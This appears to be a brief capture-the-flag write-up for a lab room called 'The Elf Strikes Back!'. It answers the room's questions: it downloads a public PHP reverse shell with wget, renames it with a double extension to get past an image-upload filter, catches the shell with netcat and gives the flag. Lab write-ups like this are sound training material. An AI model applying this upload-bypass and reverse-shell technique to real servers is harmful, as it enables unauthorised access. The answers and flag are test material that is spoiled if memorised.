The Elf Strikes Back!

Web Exploitation - GET ; Upload ; Reverse Shell

Video

Rooms

Upload vulns

Intro to Shells

Resources

PHP Reverse Shell

Challenge

Open the site

You have been assigned an ID number for your audit of the system: ODIzODI5MTNiYmYw

http://10.10.236.79/?id=ODIzODI5MTNiYmYw

What string of text needs adding to the URL to get access to the upload page?

?id=ODIzODI5MTNiYmYw

What type of file is accepted by the site?

Image

Bypass the filter and upload a reverse shell.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

mv php-reverse-shell.php image.jpeg.php

Change the following parameters in the file

Tried /uploads, /images, /media, /resources

In which directory are the uploaded files stored?

/uploads/

Activate your reverse shell and catch it in a netcat listener!

No answer needed

What is the flag in /var/www/flag.txt?

THM{MGU3Y2UyMGUwNjExYTY4NTAxOWJhMzhh}